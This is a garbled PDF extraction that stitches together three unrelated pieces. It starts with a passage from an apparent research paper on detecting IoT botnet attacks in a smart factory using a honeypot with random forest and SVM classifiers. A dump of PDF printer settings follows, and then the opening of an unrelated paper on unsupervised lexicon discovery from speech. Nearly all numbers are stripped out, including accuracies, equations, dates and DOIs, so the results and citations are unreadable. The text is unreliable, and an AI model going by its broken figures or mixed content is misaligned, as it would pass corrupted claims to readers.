. user accounts checking in t-pot. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ moving to stage —log data collect, data which was earlier obtained from the authorized users in stage , was being processed through a series of steps, that is, retrieve logs, extract records, filter, text processing, upload, end automated process. during the text processing step before uploading, this was where machine learning was integrated with the honeypot for the purpose of classifying botnet attacks as illustrated in fig. . as a result of classification, botnet attacking behaviors or botnet intrusion types were obtained and therefore used for machine learning training to detect botnets. after machine learning classification, processed data was converted to output result file and uploaded to end the automatic process. algorithm for botnet classification by machine learning is shown in table . instruction to verify the codes and dataset: . read the package setting for caret, dplyr, and readr in the library (this package can balance the dataset for four categories of botnet attacks). . make setting in the computer for dataset with frame set and honeypot log file. figure kibana dashboard. metrics are shown by integrating detection real-time threat charts, maps, and filters. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . start the test based on the best feature data and wait until the true setting to come out. . proceed to filter, extract records, review logs and test processing. . apply (flgs_number, srate, drate, rate, max, state_number, mean, min, stddev, seq) to each classified category. . obtain log files as samples for machine learning classifying into four types of botnets (distributed denial of service (ddos), dos, reconnaissance and theft). . call in the algorithm (random forest or svm) to start classification. . predict botnets based on the classification result in term of accuracy, time taken, false positive rate, and p-value. results in this section, results were collected mainly from the machine learning classification of botnet attacks. the data collection for the experiment was randomized if the reference was used. the experiment was carried out using raspberry pi and a personal computer. features of the selected dataset were first described in dataset section. to perform the classification on the dataset, honeypot combined machine learning model simulation was run by two techniques that is, weka, and rstudio. the collected results were evaluated by comparison between the two, and with other study. dataset in order to use a machine learning method to identify botnet as the target of iot-based network and physical layer in smart factories, we experimented with data set features of this paper (koroniotis et al., ), which is the most suitable data set for this study. dataset used for classification was selected based on ten features which were closely related to the botnet intrusion types. details of the features are presented in table , which was extracted from a direct comparison of entropy and correlation scores in the previous study (zheng & keong, , koroniotis et al., ). specifically, transmission formation was calculated as correlation indices which were evaluated for their statistical measurement values. the calculation of indices was performed using the following equation. xi ¼ xi � xminð Þ� b � að Þ xmax � xminð Þ þ a model simulation was evaluated using some of the evaluation metrics of machine learning as shown in table (koroniotis et al., ). based on the results, the model can be evaluated whether it is highly efficient in optimization and able to reduce the error of drate. the values of max and min were to represent the values of training and response. examples of correlation are in fig. (koroniotis et al., ). classification by weka-machine learning classification result of the weka-machine learning technique for four types of botnet attacks namely ddos, dos, reconnaissance, and theft is shown in fig. . for instances, lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the average percentage of correct prediction (accuracy) for all four botnet attacks achieved . %. the kappa statistic showed the model stability was . with a mean absolute error of just . . in term of accuracy and precision for each type of attacks, reconnaissance has the highest values. furthermore, after collecting pcap files from the virtual settings, statistical measures using correlation coefficients and entropy techniques were adopted to extract flow data using argus tools in order to evaluate datasets based on the best features. a new function was created based on the transaction flow of network connections to find out normal and intrusive events. a machine learning model has been trained and validated in different versions of datasets to assess the value of datasets compared to other datasets as shown in fig. . classification by rstudio-machine learning figure shows the results of classification using rstudio machine learning technique. two methods were used, that is, support-vector machine (svm) and random forest (rf). rf was calculated using the decision tree (dt) to predict mean values. rf was selected figure process design of honeypot combined machine learning model to detect botnet attacks in smart factory. honeypot simulation, log data collect classification flowchart. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ because it showed the effective detection in discrete datasets such as botnet (kok, abdullah & jhanjhi, ). evaluation of the classification result were based on nine parameters namely, sensitivity, specificity, pos pred value, neg prered value, prevalence, detection rate, detection prevalence, balance accuracy, average. in the rf method, a high accuracy was achieved at . . the % cis were . and . . the rf provides kappa at . . however, for svm method, the accuracy was obtained at . which is much lower than that of the rf. the % cis were . , table algorithm for data classification. algorithm: botnet-based classification ml and honeypot detection for improving the security of smart factory iot . input: list of classified feature-valued training data set (t , t , t , …, tn) & vm . output: feature tasks dt . begin . initialization: dt; .sort tasks according to dt ascendingly . if . dt belongs to same vm . ta = testing attribute . {combine dt =t; . else . priorities based on (data set ) . for each vm i = to n . {calculate information_gain} . repeat if change is available factor & ta then . for (each df in the splitting of ta) . if (t’ is empty) . else . start get sample again . until all features allocated to a vm . end table ten features of the selected dataset for classification. no. name of features description srate foundation-to-target t time packets for each second drate target-to-foundation packets for each second rate over-all packets for each second in transaction max maximum period of collected archives source state_number numerical illustration of characteristic state mean average period of collecting records min minimum time of collecting records stddev standard deviation of aggregated records total flgs_number numerical representation of feature flags seq argus sequence number lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table machine learning evaluation metrics. accuracy acc ¼ tp tp þ fp precision ppv ¼ tp tp þ fp recall tpr ¼ tp tp þ fn fall-out fpt ¼ fp fp þ tn notes: tp (true positive): number of botnet containers represent as botnet. fp (false positive): number of regular containers symbolized as botnet. tn (true negative): number of normal containers represent as standard traffic. fn (false negative): number of botnet containers symbolized as standard traffic. figure detailed accuracy by classification. the estimated trend for each botnet type is shown. full-size doi: . /peerj-cs. /fig- figure correlation of true vs. false positive rates for the best features. (a) roc curve for rf, svm model (area = . ); (b) roc curve for rf, svm model (area = . ). full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . . as can be seen in fig. , classification of ddos attack type is highly efficient using rstudio with respect to all evaluating parameters. the detection rate and detection prevalence have low probabilities of . and . respectively. the overall detection using r-studio showed a statistically significant result since p-value is less than %. discussion the two machine learning programs (weka and rstudio) following the random forest algorithm showed good result of classification and comparable with another study as shown in fig. . in the study of mathur, raheja & ahlawat ( ), botnet were detected via mining of the network traffic flow with random committee method. the resultant accuracy of the random committee was achieved at . %, which was . % lower than figure correlation of features for weka-machine learning. training and testing classification result is shown. full-size doi: . /peerj-cs. /fig- figure r-studio results. the ddos attack type is highly aggressive. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ those obtained in this study at . % for random forest-weka and % for random forest-rstudio. in term of time taken, both random forest-weka and random committee were able to detect botnets within a very short time of . s or . ms. whereas it took a very much longer time of . s for the random forest-rstudio to detect botnets because of its program package. in addition, the p-value representing the significance of the detection models, p value to the random forest-rstudio was less than % ( . × − ), which showed that the detection model is statistically significant. as mentioned earlier that real time detection is the key factor importance to the network security of the smart factory, random forest method is therefore considered to be highly suitable for the environment of smart factory operating / in time. the result of this study can be said to be just relatively comparable with the work of mathur, raheja & ahlawat ( ), since both of the studies were based on network traffic flow and targeting at the botnet attack. however, for the feasibility to apply in the smart factory environment, this study shows to be more feasible because of two reasons. first, the experiments were conducted on simulation of hardware specifically configured to mimic the real smart factory environment using iot devices as mentioned in the proposed model section, which is lacked in the work of mathur, raheja & ahlawat ( ). secondly, the experimental results obtained in this study addressed directly to the three deciding factors (time taken: . ms, accuracy: above % and fpr: . , refer to table ) which are very useful for evaluating any tested methods being applied in the smart factory. figure graphical comparison of random forest in this study with random committee in other study. (a) accuracy; (b) time taken; (c) p-value and (d) fpr value. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ whereas the latest publication work in reported that their study was based on smart factory ambient/environment to detect context-aware intrusion using machine learning (park, li & hong, ). but there was no mention in that study to target any specific types of cyber attacks or virus, but only for anomaly signs. another limitation of the study is that its result just stated a very general possibility of process improvement of % from . % (park, li & hong, ). without showing the three deciding factors (time taken, accuracy and fpr), it can be hardly possible to evaluate the feasibility to apply for the smart factory. in addition to this point, the part of using machine learning used for training to obtain intrusions did not mention to include the best features of smart factory in the datasets. if including it would be very helpful to increase the feasibility or applicability of any detection models at the physical layers with interconnection of many iot devices, as this present study were conducted accordingly. furthermore, the kibana platform supporting for a visualization of the system/model performance could provide a user-friendly interface for the administrators in the smart factory to analyze from a variety of perspectives more than just a visible display. this study had provided a basic background for developing a security network just for the smart factory environment with a mimicking iot device hardware configuration and random algorithms for the experimental work. the results can be used as reference points or benchmarks for more comparison with other future studies relating to smart factory. in fact, the number of studies focusing on the security network for smart factory to target specifically botnet attacks using honeypot is currently scarce throughout the literature, future work can based on this smart factory hardware configuration design for the experimental testing for models or systems. also, it is suggested to further this study by conducting experiments in a real smart factory. by doing that, a better result can be obtained for analysis when many factors of smart factories are taken into consideration. instead, a controlled virtual smart factory environment was created in this study. the expected results will be more valuable for improving the productivity of smart factories. conclusions in this work, the model of combining honeypot with machine learning was proved to be feasible in detecting botnet in the smart factory. since the botnet can be easily spread into iot smart factory environment with a high risk, hardware-based simulation and classification using random forest algorithm for weka machine learning program showed table result comparison between random forest with random committee algorithms. accuracy (%) time taken (detection time) fall positive rate (fpr) p-value refs. random forest-weka . . s . – this study random forest-rstudio . s . . random committee . . s . – mathur, raheja & ahlawat ( ) lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a very good result. . % for accuracy, . ms were achieved for the proposed model to detect botnet and the fpr was low at just . . comparing this result to other studies showed that the proposed model (honeypot combined machine learning to detect and classify botnet attack) in the smart factory was evaluated to be better because of three outstanding advantages. first, iot devices were used in the hardware simulation configured to mimic the real smart factory environment. second, the result of model testing has showed that with a short time taken: . ms, high accuracy: above % and low fpr: . by the random forest weka machine learning as the deciding factors. lastly, machine learning have been used the dataset which included the best features of the smart factory for training to obtain intrusions. acknowledgements the author acknowledge the support of taylor's university, school of computer science and engineer in carrying out this experimental research work. this research work has been underwent for english proofreading prior to submitting to this journal. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � seungjin lee conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � azween abdullah analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � nz jhanjhi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � sh kok performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data is available at koroniotis et al. ( ). code is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references almusaylim za, zaman n. . a review on smart home present state and challenges: linked to context-awareness internet of things (iot). wirel networks ( ): – doi . /s - - - . aziz a. . a soft-decision fusion approach for multiple-sensor distributed binary detection systems. ieee transactions on aerospace and electronic systems ( ): – doi . /taes. . . brett s-g, marco c, lorenzo c, bob g, martin s, richard k, christopher k, giovanni v. . your botnet is my botnet: analysis of a botnet takeover. in: proceedings of the acm conference on computer and communications security. – . casalinuovo e. . thematic investment opportunity: internet of things. pennsylvania: pnc financial services group, inc. available at https://www.pnc.com/content/dam/pnc-thought- leadership/pdf/wealth-management/hawthorn/thematic-investing_internet_of_things.pdf. chen b, wan j, shu l, li p, mukherjee m, yin b. . smart factory of industry . : key technologies, application case, and challenges. ieee access (c): – doi . /access. . . choi sk, yang ch, kwak j. . system hardening and security monitoring for iot devices to mitigate iot security vulnerabilities and threats. ksii transactions on internet and information systems ( ): – . dowling s, schukat m, melvin h. . a zigbee honeypot to assess iot cyberattack behaviour. in: th irish signals and systems conference (issc). piscataway: ieee, – doi . /issc. . . duessel p, gehl c, flegel u, dietrich s, meier m. . detecting zero-day attacks using context-aware anomaly detection at the application-layer. international journal of information security ( ): – doi . /s - - -y. fan y, zhao g, li kc, zhang b, tan g, sun x, xia f. . snpl: one scheme of securing nodes in iot perception layer. sensors ( ): – . fedynyshyn g, chuah mc, tan g. . detection and classification of different botnet c&c channels. lecture notes in computer science : – . fenzl f, rieke r, chevalier y, dominik a, kotenko i. . continuous fields: enhanced in-vehicle anomaly detection using machine learning models. simulation modelling practice and theory (june): . gerstmayer f, hausladen j, kramer m, horauer m. . binary protection framework for embedded systems. in: th ieee international symposium on industrial embedded systems (sies), – june . piscataway: ieee. guo d, zhong ry, ling s, rong y, huang gq. . a roadmap for assembly . : self-configuration of fixed-position assembly islands under graduation intelligent manufacturing system. international journal of production research ( ): – doi . / . . . humayun m, jhanjhi nz, alamri mz, khan a. . smart cities and digital governance: employing recent technologies for improved digital governance. hershey: igi global, – . ja’fari f, mostafavi s, mizanian k, jafari e. . an intelligent botnet blocking approach in software defined networks using honeypots. journal of ambient intelligence and humanized computing doi . /s - - - . jiafu w, shenglong t, zhaogang s, di l, shiyong w, muhammad i, athanasios vv. . software-defined industrial internet of things in the context of industry . . ieee sensors journal ( ): – . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /taes. . https://www.pnc.com/content/dam/pnc-thought-leadership/pdf/wealth-management/hawthorn/thematic-investing_internet_of_things.pdf https://www.pnc.com/content/dam/pnc-thought-leadership/pdf/wealth-management/hawthorn/thematic-investing_internet_of_things.pdf http://dx.doi.org/ . /access. . http://dx.doi.org/ . /issc. . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ katz g, piantanida p, debbah m. . distributed binary detection with lossy data compression. ieee transactions on information theory ( ): – doi . /tit. . . kok sh, abdullah a, jhanjhi nz. . early detection of crypto-ransomware using pre-encryption detection algorithm. journal of king saud university - computer and information sciences doi . /j.jksuci. . . . koroniotis n, moustafa n, sitnikova e, turnbull b. . towards the development of realistic botnet dataset in the internet of things for network forensic analytics: bot-iot dataset. future generation computer systems : – doi . /j.future. . . . li x, li d, wan j, liu c, imran m. . adaptive transmission optimization in sdn-based industrial internet of things with edge computing. ieee internet things journal ( ): – doi . /jiot. . . lim m, abdullah a, jhanjhi nz, khurram khan m, supramaniam m. . link prediction in time-evolving criminal network with deep reinforcement learning technique. ieee access : – doi . /access. . . mathur l, raheja m, ahlawat p. . botnet detection via mining of network traffic flow. procedia computer science : – doi . /j.procs. . . . mittal s, khan ma, romero d, wuest t. . smart manufacturing: characteristics, technologies and enabling factors. proceedings of the institution of mechanical engineers, part b: journal of engineering manufacture ( ): – doi . / . ozcelik m, chalabianloo n, gur g. . software-defined edge defense against iot-based ddos. in: ieee cit - th ieee international conference on computer and information technology. piscataway: ieee, – . oztemel e, gursev s. . literature review of industry . and related technologies. journal of intelligent manufacturing ( ): – doi . /s - - - . park st, li g, hong jc. . a study on smart factory-based ambient intelligence context-aware intrusion detection system using machine learning. journal of ambient intelligence and humanized computing : – doi . /s - - - . park st, li g, hong jc. . a study on smart factory-based ambient intelligence context-aware intrusion detection system using machine learning. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . ramos ksh, monge mas, vidal jm. . benchmark-based reference model for evaluating botnet detection tools driven by traffic-flow analytics. sensors ( ): – . seungjin l, abdullah a, jhanjhi nz. . a review on honeypot-based botnet detection models for smart factory. international journal of advanced computer science and applications ( ): – . smith ms. . protecting privacy in an iot-connected world. information and management journal ( ): – . vishwakarma r. . a honeypot with machine learning based detection framework for defending iot based botnet ddos attacks. in: rd international conference on trends in electronics and informatics, rd to th april , tirunelveli, tamil nadu, india. – . wang w, shang y, he y, li y, liu j. . botmark: automated botnet detection with hybrid analysis of flow-based and graph-based traffic behaviors. information sciences : – doi . /j.ins. . . . zhang w, zhang b, zhou y, he h, ding z. . an iot honeynet based on multi-port honeypots for capturing iot attacks. ieee internet of things journal ( ): – . zheng y, keong c. . a feature subset selection method based on high-dimensional mutual information. entropy ( ): – doi . /e . lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /j.jksuci. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /e http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classification of botnet attacks in iot smart factory using honeypot combined with machine learning introduction materials and methods results discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice unsupervised lexicon discovery from acoustic input chia-ying lee , timothy j. o’donnell , and james glass computer science and artificial intelligence laboratory department of brain and cognitive sciences massachusetts institute of technology cambridge, ma , usa abstract we present a model of unsupervised phono- logical lexicon discovery—the problem of simultaneously learning phoneme-like and word-like units from acoustic input. our model builds on earlier models of unsuper- vised phone-like unit discovery from acous- tic data (lee and glass, ), and unsuper- vised symbolic lexicon discovery using the adaptor grammar framework (johnson et al., ), integrating these earlier approaches us- ing a probabilistic model of phonological vari- ation. we show that the model is competi- tive with state-of-the-art spoken term discov- ery systems, and present analyses exploring the model’s behavior and the kinds of linguis- tic structures it learns. introduction one of the most basic problems of language acqui- sition is accounting for how children learn the in- ventory of word forms from speech—phonological lexicon discovery. in learning a language, children face a number of challenging, mutually interdepen- dent inference problems. words are represented in terms of phonemes, the basic phonological units of a language. however, phoneme inventories vary from language to language, and the underlying phonemes which make up individual words often have variable acoustic realizations due to systematic phonetic and phonological variation, dialect differences, speech style, environmental noise, and other factors. to learn the phonological form of words in their lan- guage children must determine the phoneme inven- tory of their language, identify which parts of the acoustic signal correspond to which phonemes— while discounting surface variation in the realiza- tion of individual units—and infer which sequences of phonemes correspond to which words (amongst other challenges). understanding the solution to this complex joint- learning problem is not only of fundamental sci- entific interest, but also has important applications in spoken language processing (slp). even set- ting aside additional grammatical and semantic in- formation available to child learners, there is still a sharp contrast between the type of phonological learning done by humans and current slp meth- ods. tasks that involve recognizing words from acoustic input—such as automatic speech recogni- tion and spoken term discovery—only tackle parts of the overall problem, and typically rely on linguistic resources such as phoneme inventories, pronuncia- tion dictionaries, and annotated speech data. such resources are unavailable for many languages, and expensive to create. thus, a model that can jointly learn the sound patterns and the lexicon of a lan- guage would open up the possibility of automati- cally developing slp capabilities for any language. in this paper, we present a first step towards an unsupervised model of phonological lexicon discov- ery that is able to jointly learn, from unannotated speech, an underlying phoneme-like inventory, the pattern of surface realizations of those units, and a set of lexical units for a language. our model builds on earlier work addressing the unsupervised discov- ery of phone-like units from acoustic data—in par- ticular the dirichlet process hidden markov model (dphmm) of lee and glass ( )—and the un- transactions of the association for computational linguistics, vol. , pp. – , . action editor: eric fosler-lussier. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. supervised learning of lexicons from unsegmented symbolic sequences using the adaptor grammar (ag) framework (johnson et al., ; johnson and goldwater, a). we integrate these models with a component modeling variability in the surface re- alization of phoneme-like units within lexical units. in the next section, we give an overview of re- lated work. following this, we present our model and inference algorithms. we then turn to prelimi- nary evaluations of the model’s performance, show- ing that the model is competitive with state-of-the- art single-speaker spoken term discovery systems, and providing several analyses which examine the kinds of structures learned by the model. we also suggest that the ability of the system to successfully unify multiple acoustic sequences into single lexical items relies on the phonological-variability (noisy channel) component of the model—demonstrating the importance of modeling symbolic variation in phonological units. we provide preliminary evi- dence that simultaneously learning sound and lexi- cal structure leads to synergistic interactions (john- son, b)—the various components of the model mutually constrain one another such that the linguis- tic structures learned by each are more accurate than if they had been learned independently. related work previous models of lexical unit discovery have pri- marily fallen into two classes: models of spoken term discovery and models of word segmentation. both kinds of models have sought to identify lexi- cal items from input without direct supervision, but have simplified the joint learning problem discussed in the introduction in different ways. spoken term discovery spoken term discovery is the problem of using unsupervised pattern discov- ery methods to find previously unknown keywords in speech. most models in this literature have typi- cally made use of a two-stage procedure: first, sub- sequences of the input that are similar in an acoustic feature space are identified, and, then clustered to discover categories corresponding to lexical items (park and glass, ; zhang and glass, ; zhang et al., ; jansen et al., ; aimetti, ; mcinnes and goldwater, ). this prob- lem was first examined by park and glass ( ) who used dynamic time warping to identify sim- ilar acoustic sequences across utterances. the in- put sequences discovered by this method were then treated as nodes in a similarity-weighted graph, and graph clustering algorithms were applied to produce a number of densely connected groups of acoustic sequences, corresponding to lexical items. building on this work, zhang and glass ( ) and zhang et al. ( ) proposed robust features that allowed lexical units to be discovered from spoken docu- ments generated by different speakers. jansen et al. ( ) present a similar framework for finding re- peated acoustic patterns, based on line-segment de- tection in dotplots. other variants of this approach include mcinnes and goldwater ( ) who com- pute similarity incrementally, and aimetti ( ) who integrates a simplified, symbolic representation of visual information associated with each utterance. word segmentation in contrast to spoken term discovery, models of word (or morpheme) segmen- tation start from unsegmented strings of symbols and attempt to identify subsequences corresponding to lexical items. the problem has been the focus of many years of intense research, and there are a large variety of proposals in the literature (harris, ; saffran et al., a; harris, ; olivier, ; saffran et al., b; brent, b; frank et al., ; frank et al., ). of particular interest here are models which treat segmentation as a sec- ondary consequence of discovering a compact lexi- con which explains the distribution of phoneme se- quences in the input (cartwright and brent, ; brent, a; goldsmith, ; argamon et al., ; goldsmith, ; creutz and lagus, ; goldwater et al., ; mochihashi et al., ; el- sner et al., ; neubig et al., ; heymann et al., ; de marcken, c; de marcken, a). recently, a number of such models have been intro- duced which make use of bayesian nonparametric distributions such as the dirichlet process (fergu- son, ) or its two-parameter generalization, the pitman-yor process (pitman, ), to define a prior which favors smaller lexicons with more reusable lexical items. the first such models were proposed in goldwater ( ) and, subsequently, have been extended in a number of ways (goldwater et al., ; neubig et al., ; heymann et al., ; mochihashi et al., ; elsner et al., ; john- son et al., ; johnson and demuth, ; john- son and goldwater, b; johnson, a; john- son, b). one important lesson that has emerged from this literature is that models which jointly represent mul- tiple levels of linguistic structure often benefit from synergistic interactions (johnson, b) where dif- ferent levels of linguistic structure provide mutual constraints on one another which can be exploited simultaneously (goldwater et al., ; johnson et al., ; johnson and demuth, ; johnson and goldwater, b; johnson, a; börschinger and johnson, ; johnson, b). for example, elsner et al. ( ) show that explicitly modeling symbolic variation in phoneme realization improves lexical learning—we use a similar idea in this paper. an important tool for studying such synergies has been the adaptor grammars framework of john- son et al. ( ). adaptor grammars are a gen- eralization of probabilistic context-free grammars (pcfgs) which allow the lexical storage of com- plete subtrees. using adaptor grammars, it is pos- sible to learn lexica which contain stored units at multiple levels of abstraction (e.g., phonemes, on- sets, codas, syllables, morphemes, words, and multi- word collocations). a series of studies using the framework has shown that including such additional structure can markedly improve lexicon discovery (johnson et al., ; johnson and demuth, ; johnson and goldwater, b; johnson, a; börschinger and johnson, ; johnson, b). unsupervised lexicon discovery in contrast to models of spoken term discovery and word segmen- tation, our model addresses the problem of jointly inferring phonological and lexical structure directly from acoustic input. spoken term discovery sys- tems only attempt to detect keywords, finding lex- ical items that are isolated and scattered throughout the input data. they do not learn any intermediate levels of linguistic structure between the acoustic in- put and discovered lexical items. in constrast, our model attempts to find a complete segmentation of the input data into units at multiple levels of abstrac- tion (e.g., phonemes, syllables, words, etc.). un- like word segmentation models, our model works directly from speech input, integrating unsupervised acoustic modeling with an an approach to symbolic lexicon discovery based on adaptor grammars. although some earlier systems have examined various parts of the joint learning problem (bac- chiani and ostendorf, ; de marcken, b), to our knowledge, the only other system which ad- dresses the entire problem is that of chung et al. 